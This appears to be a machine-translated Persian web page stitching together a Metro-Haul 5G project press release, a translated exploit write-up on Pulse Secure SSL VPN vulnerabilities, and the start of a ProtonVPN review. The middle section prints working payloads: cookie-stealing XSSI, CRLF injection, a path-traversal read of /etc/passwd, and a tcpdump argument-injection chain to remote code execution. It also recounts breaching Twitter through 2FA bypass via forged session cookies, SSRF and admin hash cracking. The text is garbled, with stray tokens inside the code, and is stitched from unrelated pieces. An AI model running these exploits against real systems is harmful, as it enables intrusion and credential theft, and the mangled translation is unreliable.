دسته: آنتی فیلتر برای ویندوز

پروژه مترو-حمل و نقل "فوق العاده موفق" در پشتیبانی از خدمات 5G – METRO-HAUL

پروژه فوق العاده موفق "Metro-Haul" برنامه های نهایی را تحویل می گیرد و نمایش هایی را برای نشان دادن ارزش کنترل SDN از شبکه های مترو انعطاف پذیر برای پشتیبانی از خدمات 5G ارائه می دهد

نشست پیزا پروژه بودجه اتحادیه اروپا به میزبانی اریکسون Telecomunicazioni و CNIT [19659003] پیزا ، ایتالیا ، 31 اکتبر 2019 – 28 ماه از زمان اجرای 3 ساله خود ، نمایندگان 21 سازمان شریک در پیزا برای برنامه ریزی مراحل نهایی پروژه Metro-Haul ملاقات کردند. پیزا خانه دو عضو کنسرسیوم (Ericsson Telecomunicazioni و Consorzio Nazionale Interuniversitario Per Le Telecomunicazioni (CNIT)) است و آنها با مهربانی میزبان این نشست بودند.

Metro-Haul یک برنامه تحقیق و نوآوری اتحادیه اروپا Horizon 2020 است. تلاش برای طراحی و ایجاد زیرساخت های هوشمند نوری مترو قادر به پشتیبانی از ترافیک ناشی از شبکه های دسترسی 5G ناهمگن ، پرداختن به ظرفیت پیش بینی شده ظرفیت و ویژگیهای خاص آن ، مانند تحرک ، تأخیر کم ، کم لرزه و غیره است. خدمات و استفاده از موارد با تأکید ویژه بر خدمات صنایع مختلف عمودی تا فناوری اطلاعات و ارتباطات.

این پروژه به تازگی بررسی پروژه دوم سال خود را انجام داده كه در آن زمان كار تاكنون به عنوان برجسته ارزیابی شده است ، و موفقیت فوق العاده ای از طریق انبوه آن ثبت شده است. تأثیر در انتشار و استاندارد سازی. در مدت زمان بیش از دو سال ، این پروژه بیش از 170 مقاله را در مجلات و رویه های کنفرانس منتشر کرده است. مقالات و وبلاگ پروژه را می توان در وب سایت آن به آدرس https://www.metro-haul.eu/.ociation19659005 با توجه یافتن فن آوری جدید شبکه 5G طیف گسترده ای از خدمات جدید را تسهیل می کند که به طور بنیادی تغییر خواهد کرد کاربران اینترنت را تجربه می کنند ، "گفت: آنتونیو D'Errico ، محقق ارشد Ericsson Telecomunicazioni. "این اتصال دستگاه های هوشمند از جمله در وسایل نقلیه خودمختار را تسهیل می کند ، و برنامه های مشترک بین کاربران را هنگام حرکت در زندگی آنها تسهیل می کند."

"اریکسون از بخشی از پروژه Metro-Haul خوشحال است." . "ما در بسیاری از فن آوری های لازم برای ساختن یک شبکه 5G پایان به کار متخصص هستیم و ضروری است که ما نقش موثری در تحقیقات پیشرو در مورد نحوه ساخت و استقرار این شبکه ها داشته باشیم."

فیلیپو کوگینی ، مدیر CNIT در Metro گفت: "CNIT یک کنسرسیوم غیر انتفاعی است که در سال 1995 تاسیس شده و 37 دانشگاه عمومی ایتالیا را برای انجام فعالیت های تحقیقاتی ، نوآوری و آموزش / آموزش در زمینه فناوری اطلاعات و ارتباطات گرد هم آورده است." حمل و نقل. "یکی از پنج آزمایشگاه ملی ما در پیزا واقع شده است و ما در شبکه ها و فن آوری های فوتونیک تخصص داریم."

"CNIT توسعه دهنده پیشرو تجهیزات نوری پیشرفته است ، و ما خوشحالیم که ROADM ها و ماتریس های سوئیچینگ ما به عنوان هسته استفاده می شوند. مؤلفه های سناریوهای تظاهرات مترو-هال ، "فیلیپو توضیح داد. "این تظاهرات ها برای تعیین ارزش Metro-Haul و اثبات اینكه طیف گسترده ای از فن آوری های تولید شده توسط شرکاء می توانند برای ارائه خدمات واقعی در شبکه های واقعی ادغام شوند ، مهم است."

این مجامع برای پروژه بسیار مهم بوده است. زیرا بیش از 40 نفر را از سراسر اروپا گرد هم آورده اند تا جزئیات تظاهرات را نهایی کنند. سناریوهایی که نمایش داده می شود ، پیچیده است و بحث های این هفته بسیار شدید بوده است ، اما پیشرفت مهم زیادی انجام شده است و ما اطمینان داریم که قادر خواهیم بود شبکه های عملیاتی معتبر را قبل از پایان پروژه در تابستان 2020 نشان دهیم.

درباره Metro-Haul

که در اواسط سال 2017 راه اندازی شد ، پروژه Metro-Haul بودجه (GA 761727) از برنامه تحقیق و نوآوری Horizon 2020 اتحادیه اروپا دریافت می کند. هدف از این پروژه 7.7 میلیون یورو طراحی و ساخت زیرساخت هوشمند مترو نوری است که قادر به پشتیبانی از ترافیک ناشی از شبکه های دسترسی 5G ناهمگن ، پرداختن به افزایش ظرفیت پیش بینی شده و ویژگی های خاص آن از جمله تحرک ، تأخیر کم و جهش کم است. این زیرساخت همچنین از خدمات گسترده ای پشتیبانی خواهد کرد و از موارد خاص با تأکید ویژه بر خدمات صنایع مختلف به صورت عمرانی و فناوری اطلاعات و ارتباطات پشتیبانی خواهد کرد.

وب سایت: https://metro-haul.eu
توییتر: MetroHaul
Linked-In: https://www.linkedin.com/groups/13543287 موفق19459010LOADResearchGate: https://www.researchgate.net/project/Metro-Haulociation19659015]

حمله به SSL VPN – قسمت 3: زنجیره ای Golden Pulse Secure SSL VPN RCE زنجیره ای ، با توییتر به عنوان مورد مطالعه!

نویسنده: Orange Tsai ( @ orange_8361 ) and Meh Chang (mehqq_ )

سلام ، این آخرین قسمت از سری Attacking SSL VPN است. اگر هنوز مقالات قبلی را نخوانده اید ، لینکهای سریع برای شما آورده شده است:

بعد از اینکه تحقیقات خود را در بلک هات منتشر کردیم ، به دلیل شدت زیاد و تأثیرات بسیار زیاد ، توجه و بحث های زیادی را به خود جلب کرد. بسیاری از افراد اخبار دست اول را می خواهند و از تعجب كه زمان انتشار این سوءاستفاده (به ویژه Pulse Secure preAuth one) منتشر خواهد شد ، می خواهند.

ما همچنین این موضوع را در داخل مورد بحث قرار دادیم. در واقع ، ما می توانیم بدون هیچ گونه نگرانی کل سوء استفاده ها را کنار بگذاریم و افشای رسانه های زیادی را بدست آوریم. با این حال ، به عنوان یک شرکت امنیت ، مسئولیت ما این است که جهان را ایمن تر کنیم. بنابراین تصمیم گرفتیم افشای عمومی را به تعویق بیندازیم تا به دنیا فرصت بیشتری برای اعمال تکه ها بدهیم!

متأسفانه ، سوء استفاده ها توسط شخص دیگری فاش شد. آنها را می توان به راحتی در GitHub [1] [2] [3] و بهره برداری از db [1] یافت. راستش ، ما نمی توانیم بگوییم که آنها اشتباه هستند ، زیرا اشکالات چند ماه پیش کاملاً برطرف شده اند ، و آنها وقت خود را صرف متفاوت / معکوس / تولید مثل کردند. اما واقعاً این سؤال است که می توان از جامعه امنیتی سؤال کرد: اگر سلاحی در سطح هسته ای دارید ، چه زمانی برای افشای عمومی آماده است؟ از آمار Bad Packet ، تعداد بیشماری ارتش Fortune 500 ، ایالات متحده ، دولت ، مؤسسات مالی و دانشگاهها نیز تحت تأثیر این امر قرار دارند. حتی 10 سرور ناسا وجود دارد که در معرض این اشکال قرار دارند . بنابراین ، این افشاگری های عمومی زودرس در واقع این افراد را مجبور می کند تا SSL VPN خود را ارتقا دهند ، این بخش خوبی است.

از طرف دیگر ، نکته بد این است که در این میان تعداد فزاینده ای از بات نت ها وجود دارند که اینترنت را اسکن می کنند. اطلاعات همچنین اشاره می کند که در حال حاضر یک گروه چین APT وجود دارد که از این اشکال سوء استفاده می کند. این یک فاجعه اینترنتی است. ظاهرا هنوز جهان آماده نیست. بنابراین ، اگر Palo Alto ، Fortinet یا Pulse Secure SSL VPN خود را به روز نکرده اید ، لطفاً آن را ASAP به روز کنید.

Pulse Secure رهبر بازار SSL VPN است که راه حل های دسترسی ایمن حرفه ای برای Hybrid IT را ارائه می دهد. Pulse Secure مدتهاست که در صف تحقیقات ما قرار دارد زیرا این یک زیرساخت مهم Google است که یکی از اهداف بلند مدت ما است. با این حال ، گوگل مدل امنیتی Zero Trust را اعمال می کند ، بنابراین VPN اکنون حذف شده است.

ما در اواسط دسامبر سال گذشته شروع به بررسی Pulse Secure کردیم. در 2 ماه اول ، ما هیچ چیزی دریافت نکردیم. Pulse Secure از شیوه کدگذاری و آگاهی امنیتی خوبی برخوردار است به طوری که پیدا کردن اشکالات پیش پا افتاده دشوار است. در اینجا یک مقایسه جالب وجود دارد ، ما در اولین روز تحقیق ما پرونده دلخواه خواندن CVE-2018-13379 را در FortiGate SSL VPN یافتیم …

Pulse Secure نیز عاشق Perl است و تعداد زیادی پسوند Perl را در C ++ می نویسد. تعامل بین پرل و C ++ برای ما نیز گیج کننده است ، اما در حالی که زمان بیشتری را برای حفاری در آن هزینه کردیم با آن بیشتر آشنا شدیم. سرانجام ، ما اولین خون را در 8 مارس 2019 گرفتیم! این یک سرریز مبتنی بر پشته بر روی رابط مدیریت است! اگرچه این اشکال چندان مفید نیست ، از آن زمان پیشرفت تحقیقات ما در حال پیگیری بود و ما بیشتر اشکالات آن را کشف کردیم.

ما تمام یافته های خود را به Pulse Secure PSIRT در 22 مارس 2019 گزارش دادیم. . پاسخ آنها بسیار سریع است و این آسیب پذیری ها را جدی می گیرند! پس از چندین تماس کنفرانسی با Pulse Secure ، آنها تمام مشکلات را فقط طی یک ماه برطرف کردند ، و تکه ها را در 24 آوریل 2019 منتشر کردند. شما می توانید مشاوره امنیتی دقیق را بررسی کنید!

زمان بسیار خوبی برای همکاری با Pulse Secure است. از دیدگاه ما ، Pulse Secure مسئولیت پذیرترین فروشنده در بین کلیه فروشندگان SSL VPN است که ما در این مورد اشکالات را گزارش کرده ایم!

ما در کل 7 آسیب پذیری پیدا کرده ایم. در اینجا لیست است. ما هر یک را معرفی خواهیم کرد ، اما روی CVE-2019-11510 و CVE-2019-11539 بیشتر تمرکز خواهیم کرد.

  • CVE-2019-11510 – خواندن پرونده دلخواه پیش نویس
  • CVE-2019-11542 – Post-auth ( سرپرست) سرریز بافر Stack Buffer
  • CVE-2019-11539 – تزریق فرمان ارسال پس از (مدیر)
  • CVE-2019-11538 – Post-auth (کاربر) خواندن پرونده های دلخواه از طریق NFS
  • CVE-2019-11508 – نوشتن پرونده خودسرانه پس از اتمام (کاربر) از طریق NFS
  • CVE-2019-11540 – گنجاندن اسکریپت متقاطع سایت پس از تالیف
  • CVE-2019-11507 – برنامه نویسی متقاطع پس از اتمام

نسخه های تحت تأثیر

  • Pulse Connect Secure 9.0R1 – 9.0R3.3
  • Pulse Connect Secure 8.3R1 – 8.3R7
  • Pulse Connect Secure 8.2R1 – 8.2R12
  • Pulse Connect Secure 8.1R1 – 8.1R15
  • Pulse Connect Secure 8.2R1 – 8.2R12
  • Pulse Connect Secure 8.1R1 – 8.1R15
  • Pulse Connect Secure 8.0R1 – 9.0R3.3
  • Secure Policy 9.0R1 – 9.0R3.3
  • Security Pulse Security 5.4R1 – 5.4R7
  • Security Pulse Secure 5.3R1 – 5.3R12
  • Policy Pulse Secure 5.2R1 – 5.2R12
  • Security Pulse Security 5.1R1 – 5.1R15

CVE-2019-11540: مقطع سایت Ript Incociation

اسکریپت /dana/cs/cs.cgi شناسه جلسه را در جاوا اسکریپت ارائه می دهد. از آنجا که نوع محتوا بر روی Application / x-javascript تنظیم شده است ، می توانیم حمله XSSI را انجام دهیم تا کوکی DSID را سرقت کنیم!

حتی بدتر ، حفاظت از CSRF در Pulse Secure SSL VPN است. DSID با استفاده از این XSSI ، ما می توانیم از همه حفاظت CSRF دور بزنیم!

PoC:



 <script  src =  "https: //sslvpn/dana/cs/cs.cgi؟ action = Appletobj" [19659040]> 

CVE-2019-11507: برنامه نویسی متقاطع

تزریق CRLF در وجود دارد /dana/home/cts_get_ica.cgi . به دلیل تزریق ، می توانیم هدرهای HTTP دلخواه را جعل کرده و محتوای HTML مخرب را تزریق کنیم.

PoC:

 https: //sslvpn/dana/home/cts_get_ica.cgi
؟ bm_id = x
& vdi = 1
& appname = aa٪ 0d٪ 0aContent-Type :: text / html٪ 0d٪ 0aContent-Disposition :: inline٪ 0d٪ 0aaa: bb 

CVE-2019-11538: Post-auth (کاربر) خواندن پرونده خودسرانه از طریق NFS [19659034] دو آسیب پذیری زیر (CVE-2019-11538 و CVE-2019-11508) بر تنظیمات پیش فرض تأثیر نمی گذارد. به نظر می رسد تنها اگر سرپرست اشتراک گذاری NFS را برای کاربران VPN پیکربندی کند.

اگر یک مهاجم بتواند هر پرونده ای را روی سرور NFS از راه دور کنترل کند ، می تواند فقط یک لینک نمادین برای هر پرونده ایجاد کند ، مانند / etc / passwd. ، و آن را از رابط وب بخوانید. علت اصلی این است که اجرای NFS سرور از راه دور را به عنوان یک دایرکتوری واقعی لینوکس سوار می کند ، و اسکریپت /dana/fb/nfs/nfb.cgi بررسی نمی کند که آیا فایل دستیابی شده یک سیمکارت است یا نه.

CVE-2019-11508: نوشتن پرونده خودسرانه از طریق NFS

این یک کمی شبیه به مورد قبلی است ، اما با یک بردار حمله متفاوت!

وقتی مهاجم آپلود می کند. یک فایل ZIP به NFS از طریق رابط وب ، اسکریپت /dana/fb/nfs/nu.cgi نام پرونده موجود در ZIP را ضد نمی کند. بنابراین ، یک مهاجم می تواند یک فایل مخرب ZIP ایجاد کند و مسیر را با ../ در نام پرونده طی کند! هنگامی که Pulse Secure فشرده شد ، مهاجم می تواند هر آنچه را می خواهد به هر مسیری بارگذاری کند!

CVE-2019-11542: Post-auth (مدیر) Stack Buffer Overflow

سرریز بافر مبتنی بر پشته در ماژول Perl زیر وجود دارد. پیاده سازی ها:

  • DSHC :: ThinkForReporting
  • DSHC :: isSendReasonStringEnabled
  • DSHC :: getRemedCustomInstruction

. این اشکال را می توان در بسیاری از مناطق ایجاد کرد ، اما در اینجا ما از /dana-admin/auth/hc.cgi به عنوان PoC ما استفاده می کنیم.

 https: // sslvpn / dana-admin / auth / hc. cgi
؟ پلتفرم = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
و خط مشی = 0

و می توانید خطای قطعه را از dmesg

 cgi-server [22950] مشاهده کنید: segfault at 61616161 ip 0000000002a80afd sp 00000000ff9a4d50 error 4 در DSHC.so: [1965909710] CVE-2019: خواندن پرونده های خودسرانه از پیش نویس 

در واقع ، این شدیدترین اشکال در این زمان است. در اجرای سرور وب است. همانطور که اسلایدهای ما ذکر کردند ، Pulse Secure سرور وب و معماری وب خود را از ابتدا پیاده سازی می کند. اعتبارسنجی مسیر اصلی بسیار دقیق است. با این حال ، از نسخه 8.2 ، Pulse Secure ویژگی جدیدی به نام HTML5 Access را معرفی کرد ، این ویژگی مورد استفاده برای تعامل با Telnet ، SSH و RDP توسط مرورگرها است. به لطف این ویژگی جدید ، اعتبارسنجی مسیر اصلی سست می شود.

به منظور اداره منابع استاتیک ، Pulse Secure یک IF-CONDITION جدید ایجاد کرد تا اعتبار سنجی مسیر در ابتدا سخت تر شود. کد به اشتباه از درخواست-> uri و درخواست-> filepath استفاده می کند ، بنابراین می توانیم / dana / html5acc / guacamole / را در پایان مشخص کنیم رشته پرس و جو برای دور زدن اعتبار و ایجاد درخواست -> filepath به هر پرونده ای که می خواهید بارگیری کنید!

و شایان ذکر است که برای خواندن پرونده های دلخواه ، باید را مشخص کنید. ] / dana / html5acc / guacamole / دوباره در وسط مسیر. در غیر این صورت ، شما فقط می توانید پسوندهای فایل محدودی از قبیل .json ، .xml یا .html را بارگیری کنید.

به دلیل سوءاستفاده در طبیعت ، دیگر هیچ نگرانی برای نشان دادن بارپرداخت وجود ندارد:

 واردات   درخواست 

 r   =   درخواست .  دریافت  ( 'https: //sslvpn/dana-na/../dana/html5acc/guacamole/ .. /../../../../../etc/passwd؟/dana/html5acc/guacamole/'roulette19659042 معروف)ross19659112 معروفprintociation19659106 غلت1919659107..19199508 ]

CVE-2019-11539: تزریق فرمان پست-auth (سرپرست)

آخرین مورد تزریق فرمان در رابط مدیریت است. ما این آسیب پذیری را خیلی زود پیدا کردیم ، اما در ابتدا راهی برای بهره برداری از آن پیدا نکردیم. در حالی که ما در وگاس بودیم ، یکی از دوستانم به من گفت که او قبلاً همان اشکال را پیدا کرد ، اما راهی برای بهره برداری از آن پیدا نکرد ، بنابراین وی به فروشنده گزارشی نداد.

با این حال ، ما این کار را کردیم ، و ما از یک روش بسیار هوشمندانه بهره برداری می کنیم:)

علت اصلی این آسیب پذیری بسیار ساده است. در اینجا یک قطعه کد از /dana-admin/diag/diag.cgi است:

 # ... 
 $ گزینه ها   =   tcpdump_options_syntax_check  ( CGI ::  param  ( "option" ))؛ 

 # ... 
 sub  tcpdump_options_syntax_check   {
   my   $ گزینه ها   =   shift ؛ 
   بازگشت   $ گزینه ها   if   system ] ( "$ TCPDUMP_COMMAND-d $ options> / dev / null 2 > & 1 ")   ==   0 ؛ 
   Return   Undef ؛ 
} 

آنقدر واضح و واضح است که همه می توانند نشان دهند که یک تزریق فرمان در گزینه های پارامتر وجود دارد! با این حال ، آیا این آسان است؟ خیر!

به منظور جلوگیری از آسیب پذیری های احتمالی ، Pulse Secure سختی های زیادی را بر روی محصولات خود اعمال می کند! مانند بررسی یکپارچگی سیستم ، سیستم فایلهای فقط خواندنی و ماژول برای قلاب زدن همه دعوتهای خطرناک پرل مانند سیستم ، open و backtick

این ماژول DSSAFE.pm نامیده می شود. این تجزیه و تحلیل خط فرمان خود را پیاده سازی می کند و مجدد I / O را در پرل مجدداً پیاده سازی می کند. در اینجا قطعات کد در Gist وجود دارد.

از قطعات کد ، می توانید ببینید که سیستم اصلی را جایگزین می کند و بسیاری از چک های موجود در __ parsecmd را انجام می دهد. همچنین بسیاری از شخصیت های بد مانند: [

 [&*(){}[]  `؛  |  | ؟  n ~ <>] را مسدود می کند

بررسی ها بسیار دقیق است به طوری که ما نمی توانیم تزریق دستور انجام دهیم. ما چندین روش برای دور زدن آن تصور کردیم و اولین چیزی که از ذهن من بیرون آمد تزریق استدلال است. ما تمام استدلالهایی را ذکر کردیم که TCPDUMP پشتیبانی می کند و دریافتیم که دستور [post] postzate -z ممکن است مفید باشد. اما نکته غم انگیز این است که TCPDUMP در Pulse Secure برای پشتیبانی از این ویژگی آبدار خیلی قدیمی است (v3.9.4 ، سپتامبر 2005) ، بنابراین ما شکست خوردیم: (

در هنگام بررسی سیستم ، فهمیدیم که اگرچه webroot فقط خواندنی است ، ما هنوز می توانیم از مکانیزم حافظه پنهان سوءاستفاده کنیم. Pulse Secure نتیجه این الگو را در / data / runtime / tmp / tt / ذخیره می کند تا سرعت در ارائه اسکریپت سرعت بگیرد. بنابراین تلاش بعدی ما این است که پرونده را با استفاده از استدلال - با نوشتن پرونده در دایرکتوری حافظه نهان بنویسید ، با این وجود نوشتن یک فایل چندگلوت به دو صورت PCAP و Perl غیرممکن است.

همانطور که به نظر می رسد ما به انتها رسیده بودیم از تزریق آرگومان ، سعی کردیم عمیق تر به اجرای DSSFAFE.pm بپردازیم تا ببینیم آیا چیزی وجود دارد که بتوانیم از آن استفاده کنیم ، وجود دارد. در اینجا ما یک نقص را در خط فرمان کشف کردیم. اگر ناقص I / O را وارد کنیم. تغییر مسیر ، بقیه قسمت تغییر مسیر کوتاه خواهد شد. گرچه این یک نقص کوچک است ، اما به ما کمک می کند تا کنترل مجدد I / O r را انجام دهیم متن! با این حال ، مشکلی که ما نمی توانیم یک اسکریپت معتبر Perl تولید کنیم ، هنوز برای ما زحمت کشید.

ما در اینجا گیر کرده ایم و وقت آن است که از این کادر فکر کنیم. تولید اسکریپت معتبر پرل از طریق STDOUT دشوار است ، آیا می توانیم فقط Perl را توسط STDERR بنویسیم؟ پاسخ بله است. هنگامی که [TCPDUMP] TCPDUMP را مجبور به خواندن یک پرونده غیر وجود از طریق -r-read-file . این خطا را نشان می دهد:

tcpdump: [filename]: هیچ پرونده یا پوشه ای

وجود ندارد. به نظر می رسد ما می توانیم " تا حدی " پیام خطا را کنترل کنیم. سپس نام پرونده چاپ 123 # را امتحان کردیم ، و جادو اتفاق می افتد!

 $  tcpdump  -d   -r   'print 123 #' 
  tcpdump: چاپ 123 #: فایلی یا دایرکتوری وجود ندارد
 
 $  tcpdump  -d   -r   'print 123 #'  2> & 1 | perl -
  123

پیام خطا اکنون به یک اسکریپت معتبر پرل تبدیل می شود. چرا؟ خوب ، بیایید اکنون یک درس Perl 101 داشته باشیم!

همانطور که می بینید ، پرل از برچسب GOTO پشتیبانی می کند ، بنابراین tcpdump : به یک برچسب معتبر در Perl تبدیل می شود. سپس بقیه را با هشتگ اظهار نظر می کنیم. با استفاده از این ترفند خلاق ، می توانیم اکنون Perl معتبر تولید کنیم!

سرانجام ، ما از نماد I / O ناقص < برای فریب فرمان DSSAFE.pm استفاده می کنیم و دستورالعمل را تغییر می دهیم. STDERR را در فهرست حافظه پنهان! در اینجا استثمار نهایی است:

 -r $ x = "ls /" ، سیستم $ x # 2> /data/runtime/tmp/tt/setcookie.thtml.ttc <

فرمان جمع شده به نظر می رسد:

 / usr / sbin / tcpdump  -d  
  -r  '$ x = "ls /"، system $ x #' 
 2> /data/runtime/tmp/tt/setcookie.thtml.ttc <
 >  / dev / null
 2> و 1

و تولید شده setcookie.thtml.ttc به نظر می رسد:

  tcpdump:   $ x  =  "ls /" ،  system [19659126] $ x  #: هیچ پرونده یا دایرکتوری 

پس از انجام این کار ، فقط می توانیم صفحه مربوطه را برای اجرای دستور خود واکشی کنیم:

  $  curl https: //sslvpn/dana-na/auth/setcookie.cgi
 boot bin home lib64 mnt opt ​​proc sys usr var
 داده ها و غیره lib از دست داده + ماژول های موجود را پیدا کردیم pkg sbin tmp
 ...

تاکنون ، کل بخش فنی این تزریق فرمان به پایان رسیده است. با این حال ، ما فکر می کنیم ممکن است یک روش خلاقانه دیگر برای بهره برداری از این امر وجود داشته باشد ، اگر یکی از آنها را پیدا کردید ، لطفاً به من بگویید! ما برای اندازه گیری زمان پاسخگویی به هر شرکت بزرگ ، نظارت بر اینترنت را دنبال می کردیم. توییتر یکی از آنهاست. آنها به دلیل برنامه bug bounty و هکرها خوب هستند. با این حال ، سوءاستفاده از یک روز درست بعد از انتشار پچ نامناسب است. بنابراین 30 روز صبر می کنیم تا توییتر SSL VPN خود را به روز کند.

باید بگوییم ، ما در آن زمان عصبی بودیم. اولین کاری که هر روز صبح انجام دادیم اینست که بررسی کنیم آیا توییتر SSL VPN خود را ارتقا می دهد یا نه! این زمان فراموش نشدنی برای ما بود: P

ما شروع به هک کردن توییتر در 28 مه 2019 کردیم. در طی این عملیات با موانع مختلفی روبرو هستیم. مورد اول ، اگرچه می توانیم رمزعبور ساده کارمندان توییتر را بدست آوریم ، اما به دلیل تأیید هویت Two Factor ، هنوز نمی توانیم وارد SSL VPN آنها شویم. در اینجا ما دو راه برای دور زدن آن را پیشنهاد می کنیم. اولین مورد این است که مشاهده کردیم توییتر از راه حل Duo استفاده می کند. در کتابچه راهنمای ذکر شده است:

امنیت برنامه Duo شما با امنیت کلید مخفی شما (اسکی) مرتبط است. آن را به عنوان اعتبار معتبر خود امن کنید. آنرا با افراد غیرمجاز به اشتراک نگذارید و به هر کسی تحت هر شرایطی ایمیل نکنید!

بنابراین اگر بتوانیم کلید مخفی را از سیستم خارج کنیم ، می توانیم API Duo را برای دور زدن 2FA اهرم کنیم. با این حال ، ما راهی سریعتر برای دور زدن آن پیدا کردیم. توییتر ویژگی Roaming Session را فعال کرد ، که برای تقویت تحرک استفاده می شود و امکان جلسه در چندین مکان IP را فراهم می کند.

به دلیل این ویژگی " راحت " ، ما فقط می توانیم پایگاه داده جلسه را بارگیری کنیم و کوکی های خود را جعل کنیم. برای ورود به سیستم آنها!

تاکنون ، ما می توانیم به توییتر اینترانت دسترسی پیدا کنیم. با این وجود ، هدف ما دستیابی به اجرای کد است! به نظر می رسد مهمتر از دسترسی به اینترانت است. بنابراین ما می خواهیم اشکال تزریق فرمان خود (CVE-2019-11539) را با هم زنجیر کنیم. خوب ، در اینجا ، ما با یک مانع دیگر روبرو شدیم. این رابط مدیریت محدود است!

همانطور که قبلاً اشاره کردیم ، اشکال ما در رابط مدیریت است. اما از نظر امنیتی ، بیشتر شرکت ها این رابط را به صورت عمومی غیرفعال می کنند ، بنابراین ما برای دسترسی به صفحه مدیر نیاز به روش دیگری داریم. اگر مقاله قبلی ما را با دقت خوانده اید ، ممکن است ویژگی " WebVPN " را به خاطر بیاورید! WebVPN پروکسی است که به اتصال به هر نقطه کمک می کند. بنابراین ، بیایید به خود متصل شویم.

بله ، SSRF است!

در اینجا ما از یک ترفند کوچک برای دور زدن محافظت های SSRF استفاده می کنیم.

آها! از طریق SSRF ، اکنون می توانیم رابط را لمس کنیم! سپس آخرین مانع بالا آمد. ما هیچ رمزعبور ساده ای از مدیران نداریم. هنگامی که پرل می خواهد داده ها را با روشهای بومی مانند برنامه افزودنی Perl در C ++ یا وب سرور تبادل کند ، از حافظه نهان برای ذخیره داده استفاده می کند. مشکل این است که Pulse Secure فراموش می کند تا داده های حساس را پس از تبادل پاک کند ، به همین دلیل می توانیم کلمات عبور ساده را در حافظه پنهان بدست آوریم. اما عملاً ، بیشتر مدیران فقط برای اولین بار وارد سیستم خود می شوند ، بنابراین گرفتن رمز ساده متن مدیر سخت است. تنها موردي كه ما دريافت كرديم ، هش رمز عبور در sha256 (md5_crypt (نمك ، ...)) است

اگر در ترك كردن هشي تجربه داريد ، مي دانيد چقدر سخت است. بنابراین ...

ما یک AWS 72 هسته ای را برای شکستن آن راه اندازی کردیم.

ما هش را شکستیم و RCE را با موفقیت گرفتیم! من فکر می کنم خوش شانس هستیم زیرا از مشاهده ما ، سیاست رمز عبور بسیار محکمی در مورد کارمندان توییتر وجود دارد. اما به نظر می رسد این سیاست برای مدیر اعمال نمی شود. طول رمزعبور مدیر فقط ده نفر است و شخصیت اول B است. در مرحله بسیار اولیه صف ترک ما است ، به طوری که می توانیم ظرف 3 ساعت هش را بشکنیم.

ما تمام یافته های خود را به توییتر گزارش دادیم و بالاترین امتیاز را از آنها دریافت کردیم. اگرچه ما نمی توانیم اثبات کنیم ، اما به نظر می رسد این اولین اجرای از راه دور کد در توییتر است! اگر به گزارش کامل علاقه دارید ، می توانید برای اطلاعات بیشتر به لینک HackerOne مراجعه کنید.

چگونه می توان چنین حملات را کاهش داد؟ در اینجا ما چندین توصیه ارائه می دهیم.

اولین گواهی Client-Side است. این همچنین موثرترین روش است. بدون داشتن گواهی معتبر ، اتصال مخرب در طی مذاکرات SSL از بین می رود! دوم تأیید هویت چند عاملی است. اگرچه این بار توییتر 2FA را شکسته ایم ، با یک تنظیم مناسب ، MFA هنوز هم می تواند سطح حمله بی شماری را کاهش دهد. در مرحله بعد ، ممیزی ورود به سیستم را کامل کنید و به یاد داشته باشید که به یک سرور ورود به سیستم خارج از مرز ارسال کنید.

همچنین ، موجودی دارایی سازمانی خود را مرتباً انجام دهید و در مشاوره امنیتی فروشنده شرکت کنید. از همه مهمتر ، همیشه سیستم خود را به روز کنید!

شرکت ما ، DEVCORE ، حرفه ای ترین خدمات تیم قرمز در آسیا را ارائه می دهد. در این بخش جایزه ، اجازه دهید صحبت کنیم که چگونه تیم قرمزها را بیشتر کنیم RED !

ما همیشه می دانیم که در یک عملیات تیم قرمز ، رایانه شخصی از ارزش بیشتری برخوردار است! چندین روش قدیمی در مدرسه برای به خطر انداختن مشتری VPN از طریق SSL VPN قبل وجود دارد ، مانند حمله به سوراخ در آب و جایگزینی عامل VPN.

در طول تحقیق ما ، یک وکتور حمله جدید پیدا کردیم تا همه مشتری ها را به دست بگیرد. این ویژگی " اسکریپت ورود به سیستم " است. تقریباً در هر SSL VPN مانند OpenVPN ، Fortinet ، Pulse Secure ... و موارد دیگر ظاهر می شود. این می تواند اسکریپت های مربوطه را برای نصب سیستم پرونده شبکه یا اجرای جدول مسیریابی پس از برقراری اتصال VPN ، اجرا کند.

به دلیل این ویژگی " سازگار با هکرها " ، هنگامی که امتیاز مدیر را بدست آوردیم ، ما می تواند از این ویژگی برای آلوده کردن کلیه مشتریان VPN استفاده کند! در اینجا ما به عنوان نمونه از Pulse Secure استفاده می کنیم و نشان می دهیم که چگونه نه تنها SSL VPN را به خطر بیاندازید بلکه کلیه مشتریان متصل خود را نیز به دست می گیرید:

خوب ، در اینجا پایان این سری Attacking SSL VPN است! از یافته های ما ، SSL VPN چنین سطح حمله بزرگی است که محققان امنیتی کمی از آنها در حال حفاری هستند. ظاهراً سزاوار توجه بیشتر است. ما امیدواریم که این نوع سریال بتواند محققان دیگر را به مشارکت در این زمینه ترغیب کند و امنیت شرکت ها را ارتقا بخشد!

با تشکر از همه بچه هایی که با آنها ملاقات کردیم ، همکاری و همکاری داشتیم. ما تحقیقات آینده تر ابتکاری بیشتری را در آینده منتشر خواهیم کرد:)

.

Обзор ProtonVPN توسط One One Guy Privacy

Дисклеймер: نظر زیر نظر من است ، كه من سعی خواهم كرد تا نمونه های زیادی را برای تأیید و هرچه بیشتر شواهد ارائه كنم. خوانندگان می توانند در اینجا درباره نحوه انجام بررسیهای من ، روش خود و غیره اطلاعات بیشتری کسب کنند. اطلاعات بیشتر در مورد نشان های بررسی در اینجا.

فهرست این بررسی شماره # 3 (در زمان چرخش ، ProtonVPN) بود

نوشته شده در 16 نوامبر 2017

ثبت نام در این سرویس: تعداد چیزهایی که من در مورد پورتال ایجاد حساب برای ProtonVPN متوجه شده ام. اولین مورد این است که نقشه ها به روشی غیر عادی شکسته شده اند. ارزانترین برنامه ها (رایگان و اولیه) سرورهای کندتری را نسبت به پرداخت ارائه می دهند. این یک چیز بد نیست لزوماً ، غیرمعمول. من عادت داشتم یک آزمایشی را برای مدت زمان محدود یا پهنای باند محدود ، اما کاملاً برجسته مشاهده کنم. برنامه رایگان دارای درگاه های P2P نیز مسدود شده است. طرح "توصیه شده" (بعلاوه) برای یک ماه خدمات بسیار گران بود – 10 دلار در ماه یا 8 دلار در ماه با تخفیف هنگام ثبت نام برای یک سال خدمت.

